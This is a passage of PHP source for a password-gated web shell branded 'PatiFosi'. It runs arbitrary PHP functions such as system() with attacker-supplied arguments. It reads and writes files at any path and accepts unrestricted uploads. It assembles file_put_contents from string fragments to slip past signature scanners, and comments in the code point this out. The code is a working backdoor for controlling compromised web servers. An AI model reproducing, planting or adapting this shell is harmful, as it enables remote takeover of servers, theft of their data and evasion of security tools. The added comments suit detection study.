<option value='MHduVGdu92YfRXZn9VZslmZ'>
<option value='-UGbpZGZhVmc'>
<option value='-UGbpZ2X0h2ZpxGanlGa'>
<option value='-=QZslmZ'>
<option value='r5Was5Wd'>
<option value='-IXaktWb'>
<option value='-g2Y19Gd'>
</datalist>
<center><h1 style='color:#2f3542'>PatiFosi</h1></center>
<a style='font-size:10; color:#ff4757'>$host</a>
<a style='font-size:10; color:#a4b0be'>@</a>
<a style='font-size:10; color:#2f3542'>$dirNow</a>
<a style='font-size:10; color:#ff4757' href='?$param=$pass'>[Home]</a><center>
<div style='background-color: #ff6b81'>
<a id='clear' style='color:#2f3542' href='?$param=$pass&mode=command&dir=$dirGET'>[command] - </a>
<a id='clear' style='color:#2f3542' href='?$param=$pass&mode=edit&dir=$dirGET'>[edit] - </a>
<a id='clear' style='color:#2f3542' href='?$param=$pass&mode=about&dir=$dirGET'>[about] </a>
</div>
<br><br>
";
// mode command
if ($mode == "command") {
$arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
echo " <form method='get' autocomplete='off'>
<table id='clear' style='text-align:center'>
<input type='hidden' name='$param' value='$pass'>
<input type='hidden' name='mode' value='command'>
$Hidinput
<tr>
<th style='display:inline-block'>iframe<br><input type='checkbox' name='sec' value='y' $cekSec> </th>
$inputDir
<th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' class='encode' type='text' name='func' value='$func' placeholder='system'> </th>
<th style='display:inline-block'>arg<br><input id='arg' class='encode' type='text' name='arg' value='$arg2' placeholder='ls'> </th>
<td><br><input type='checkbox' name='type' value='checked' $typeChecked >array <input onclick='$encButton' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>
</td>
</tr>
</table>
</form>
</center><br>
<pre style='background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;'>";
if($type == 'checked'){
echo "<i>var_dump($func($arg));</i><br>";
if (function_exists($func)) {
if($sec == 'y'){
ob_start();
@var_dump($func($arg));
$run = ob_get_clean();
echo("</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>");
} else {
@var_dump($func($arg));
}
}
} else {
if (function_exists($func)) {
if($sec == 'y'){
ob_start();
echo($func($arg));
$run = ob_get_clean();
echo "<i>echo($func($arg));</i><br>";
echo("</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>");
} else {
echo "<i>die($func($arg));</i><br>";
@die($func($arg));
}
}
}
// mode edit
} elseif ($mode == "edit") {
$arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
echo "
<form method='get'>
<table id='clear' style='text-align:center'>
<input type='hidden' name='$param' value='$pass'>
<input type='hidden' name='mode' value='edit'>
$Hidinput
<tr>
$inputDir
<th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' autocomplete='off' class='encode' type='text' name='func' value='$func' placeholder='readfile'> </th>
<th style='display:inline-block'>arg<br><input id='arg' autocomplete='off' class='encode' type='text' name='arg' value='$arg2' placeholder='file.php'> </th>
<td><br><input type='checkbox' name='type' value='ob' $typeChecked>ob <input onclick='$encButton' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>
</td>
</tr>
</table>
</form></center>
<div align='right'>
<button class='shadow' type='button' onclick='fullN()' style='border-radius: 50%; border: none; background-color: #eccc68; color: #f1f2f6; text-align:right'>_</button>
<button class='shadow' type='button' onclick='full()' style='border-radius: 50%; border: none; background-color: #2ed573; color: #f1f2f6; text-align:right'>_</button>
<button class='shadow' type='button' onclick='reset()' style='border-radius: 50%; border: none; background-color: #ff4757; color: #f1f2f6; text-align:right'>_</button>
<br></div>
<form method='post' action='?$param=$pass&mode=edit&dir=$dirGET&type=$type' enctype='multipart/form-data'>
<div class='shadow'><textarea id='codemirror' name='code' style='width:100%; height: 50%;'>";
// codemirror
if(!empty($_GET['func']) && !empty($_GET['arg'])){
if($_GET['type'] !== 'ob'){
echo(htmlspecialchars($func($arg)));
} else {
ob_start();
htmlspecialchars($func($arg));
$run = ob_get_clean();
echo(htmlspecialchars($run));
};
}elseif($_POST['code']){
echo(htmlspecialchars($_POST['code']));
};
echo "</textarea></div><br><input type='hidden' name='tmp' class='encode' value='$tmp_file'><input onclick='$encButton' type='submit' name='run' value='run >>' style='background-color: #747d8c;color: #f1f2f6; float: right;'>
<table style='width:100%'>
<tr style='text-align:center'>
<th style='display:inline-block; padding-right:10%; padding-left:10%;'>upload<br><input autocomplete='off' class='encode' type='text' name='uplto' value='$uplto' placeholder='$dirNow'><br><input type='file' name='datupload' style='border: 1px solid #dfe4ea; background:#f1f2f6;'><br><input onclick='$encButton' type='submit' name='uploadsubmit' value='upload' style='background-color: #57606f;color: #f1f2f6;'>
</th>
<th style='display:inline-block; padding-left:10%; padding-right:10%;'>save<br><input autocomplete='off' class='encode' type='text' name='saveto' value='$saveto' placeholder='$dirNow'><br><input autocomplete='off' class='encode' type='text' name='file' value='$file' placeholder='file.php'><br><input onclick='$encButton' type='submit' name='savesubmit' value='save' style='background-color: #57606f;color: #f1f2f6;'>
</form></th>
</tr>
</table>
<script>
var myCodeMirror = CodeMirror.fromTextArea(document.getElementById('codemirror'), {
theme: 'monokai',
lineNumbers: true,
matchBrackets: true,
mode: 'javascript',
viewportMargin: false,
});
function full(){
myCodeMirror.setSize('100%', '100%');
}
function fullN(){
myCodeMirror.setSize('100%', '60%');
}
function reset() {
var txt;
if (confirm('Ar u sure wanna reset d code?')) {
myCodeMirror.setValue('');
}
}
</script>
";
echo "<center><hr style='border-top: 1px solid #dfe4ea' width='90%'><h4>";
// File-write paths of edit mode. Each branch ends the response with die().
if(isset($_POST['savesubmit'])){
// Save: switch to the requested directory, then write the posted `code` to the
// requested file name. Neither the directory nor the name is restricted.
if(!chdir($saveto)){
die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> $saveto");
};
// The function name is assembled from two string fragments and invoked through
// a variable, so this call site does not contain the literal name (presumably
// to avoid simple string matching; the plain name does appear elsewhere in the
// file). Signatures keyed on the literal call will miss this write.
$fpc = 'file_p' . 'ut_contents';
$write = $fpc($file, $_POST['code']);
if($write) {
die("<mark style='background: #ffffff'><a style='color:#2ed573'> saved -> $file");
} else {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed save -> $file");
}
} elseif(isset($_POST['uploadsubmit'])){
// Upload: switch to the requested directory and copy the uploaded temp file to
// the client-supplied file name. No extension, type or content check is made,
// and copy() is used rather than move_uploaded_file().
if(!chdir($uplto)){
die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> $uplto");
};
$uploadname = $_FILES['datupload']['name'];
$uploadtmp = $_FILES['datupload']['tmp_name'];
$write = copy($uploadtmp, $uploadname);
if($write) {
die("<mark style='background: #ffffff'><a style='color:#2ed573'> uploaded -> $uploadname");
} else {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed upload -> $uploadname");
}
} elseif($tmp_run){
// Shows the status/link string prepared earlier by the "run" handler.
die("$tmp_run");
};
// mode about
} elseif ($mode == "about") {
echo '</center><pre style="background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;"><i>var_dump($w);</i><br>';
echo var_dump($w);
} else {
echo "<img src='$img'><br>what ar u doin?<br>dont forget to open <b>console.log<b><br><br><a style='font-size:10; color:#ff4757' href='?$param=$pass&mode=iframe'>[Go to iframe mode]</a>
<noscript><i>javascript isn't running</i></noscript><script>
if(!navigator.onLine) {
alert('u must connect internet for best experience');
}
</script>";
};